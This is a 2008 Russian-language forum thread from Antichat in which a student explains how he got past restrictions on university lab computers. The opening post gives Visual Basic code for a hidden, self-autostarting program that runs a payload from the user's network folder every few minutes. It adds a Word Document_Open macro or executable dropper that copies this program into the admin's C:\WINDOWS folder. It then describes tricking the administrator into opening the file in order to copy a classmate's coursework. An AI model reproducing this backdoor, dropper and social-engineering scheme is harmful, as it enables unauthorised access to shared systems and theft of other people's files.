ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > АнтиАдмин
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Ломаем Админа
  #1  
Старый 07.12.2008, 13:59
[eLseve]
Познающий
Регистрация: 01.12.2008
Сообщений: 42
Провел на форуме:
186707

Репутация: 21
По умолчанию Ломаем Админа

История состоит в том что у нас в уневере стоят компы.
Доступ закрыт ко всему на диск С: флопы закрыты из инета не чего не с качаешь на флешке не чего не притащишь потому что стоит запрет на установку оборудования BIOS стоит новый системные пароли не подберешь.

А мне срочно надо было сдавать работы а мне кокая-то пaдлa все удалила (Комп надо
выключать когда сваливаешь) а работ там много месяц делал. Я их конечно могу у кого-нибудь скачать но как ведь С: закрыт и по сетке не скинешь У нас у каждого свои папки на сервере куда только ты имеешь доступ ну и админы.
И вот лежу я както дома гружусь и вот Алилуя!!!
Вроде положение безвыходное А ВОТ НЕТ.
ИДЕЯ проста как Дырка от Бублика.
У нас установлен Visual Basic. Так что приведу пример на нем.

Нужно создать 3 проги:

#1. "универсальная" каждую 1-5 минут запускает прогу из твоей папки
Она:
Добовляется в автозагрузку с помошью API.
Сделай её не видимой (Form1.Visible=True).
Чтоб не отображалась в Ctrl+Alt+Del с помошью API.
Костяк примерно так:
Private Sub Timer1_Timer()
On Error Resume Next 'чтоб не было ошибки если там не будет проги
Shell ("J:studentsst12pusk.exe")'ну тут путь к твоей папке и к проге pusk.exe или как захочешь
End Sub
Откомпилируй её в *.exe файл ну скажем "proga.exe" и сохрани в своей папке

#2. Можно написать макрос в Word'e или сделать *.exe файл вот так:

FileCopy "J:studentsst12proga.exe", "C:WINDOWSproga.exe" ' у Админов всегда С: открыт.
Shell ("C:WINDOWSproga.exe")

Откомпилируй её в *.exe если в сохрани в Worde в процедуре Private Sub Document_Open()
Вот теперь дело за тобой.
Далее ты идешь к админу и говоришь что хочешь... главное чтоб он запусти эту прогу или Word документ. Ну я говорил, что у меня документ не открывается появляется сообщение что "нужны права Администратора" ну админ и запустил его (Наивный Чукотский Мальчик )
Ну там сами придумаете чего сказать админу там например у меня Прога какая-то появилась подозрительная.

Теперь когда прога proga.exe лежит у админа на жестком, прописана в автозагрузку, и
каждые 1 или 5 минут (я сделал 3 минуты) запускает прогу pusk.exe из твоей папки у тебя появляется вполне нормальный доступ ко всем папкам одноклассников и к компу админа. Доступ напоминает работу в DOS’e.

#3. Например мне нужно было скопировать работаму Rabota.doc у студента "st15" к себе в папку "st12" делаю такую вещь:

FileCopy "J:studentsst15Rabota.doc", "J:studentsst12Rabota.doc" ' копирую файл к себе в
папку.
Unload Form1 ' ОБЯЗАТЕЛЬНО сразу после действия закрывай прогу а то потом не удалишь её и не сможешь заменить.
Её тоже желательно делать не видимой.
 
Ответить с цитированием

  #2  
Старый 07.12.2008, 14:19
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

А доступ к реестру там случайно не закрыт?
 
Ответить с цитированием

  #3  
Старый 07.12.2008, 14:19
Qws
Участник форума
Регистрация: 17.06.2008
Сообщений: 161
Провел на форуме:
2550251

Репутация: 207
По умолчанию

Уже где то читал.Хватит копировать.
 
Ответить с цитированием

  #4  
Старый 07.12.2008, 14:29
[eLseve]
Познающий
Регистрация: 01.12.2008
Сообщений: 42
Провел на форуме:
186707

Репутация: 21
По умолчанию

Цитата:
Сообщение от iddqd  
А доступ к реестру там случайно не закрыт?
Был открыт.
 
Ответить с цитированием

  #5  
Старый 07.12.2008, 15:16
Karantin
Постоянный
Регистрация: 21.12.2007
Сообщений: 475
Провел на форуме:
1270580

Репутация: 387
Отправить сообщение для Karantin с помощью ICQ
По умолчанию

Цитата:
Сообщение от [eLseve]  
Был открыт.
и что мешает в автозагрузку прогу закинуть?
 
Ответить с цитированием

  #6  
Старый 07.12.2008, 17:01
[eLseve]
Познающий
Регистрация: 01.12.2008
Сообщений: 42
Провел на форуме:
186707

Репутация: 21
По умолчанию

Цитата:
Сообщение от Karantin  
и что мешает в автозагрузку прогу закинуть?
Был открыт,этой темой пользовались многие.щас лавку прикрыли...
 
Ответить с цитированием

  #7  
Старый 07.12.2008, 17:22
Vid0k
Постоянный
Регистрация: 24.12.2007
Сообщений: 574
Провел на форуме:
3186852

Репутация: 316


Отправить сообщение для Vid0k с помощью ICQ
По умолчанию

где копирайты и кто автор...
 
Ответить с цитированием

  #8  
Старый 03.01.2009, 17:59
Nitrogeniys
Новичок
Регистрация: 25.12.2008
Сообщений: 22
Провел на форуме:
244414

Репутация: 11
Отправить сообщение для Nitrogeniys с помощью ICQ
По умолчанию

Цитата:
Сообщение от [eLseve]  
Был открыт,этой темой пользовались многие.щас лавку прикрыли...
Да к стате!
 
Ответить с цитированием

  #9  
Старый 03.01.2009, 18:07
KaZ@NoVa
Постоянный
Регистрация: 05.07.2008
Сообщений: 555
Провел на форуме:
3134311

Репутация: 1467


Отправить сообщение для KaZ@NoVa с помощью ICQ Отправить сообщение для KaZ@NoVa с помощью AIM Отправить сообщение для KaZ@NoVa с помощью Yahoo
По умолчанию

было уже!!!) Но ещё раз непомешало!!
 
Ответить с цитированием

  #10  
Старый 24.01.2009, 03:06
Alv
Познающий
Регистрация: 30.01.2007
Сообщений: 69
Провел на форуме:
1405367

Репутация: 47
Отправить сообщение для Alv с помощью ICQ
По умолчанию

Хех. У нас в универе у каждого свой сетевой диск под паролем, и общей сетевой с заданиями на только чтение. Плюс работа в виртуальной системе. СДромов и флопиков НЕТ, флешки перезагружают систему. Интернета нет. После разлогинивания система возращается в исходное состояние. Плюс админ следит за нашими действиями, одного за игру в паучок на месяц забанил.

Надо перетащить с одного сетевого диска на другой. Как сделать аккуратно?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ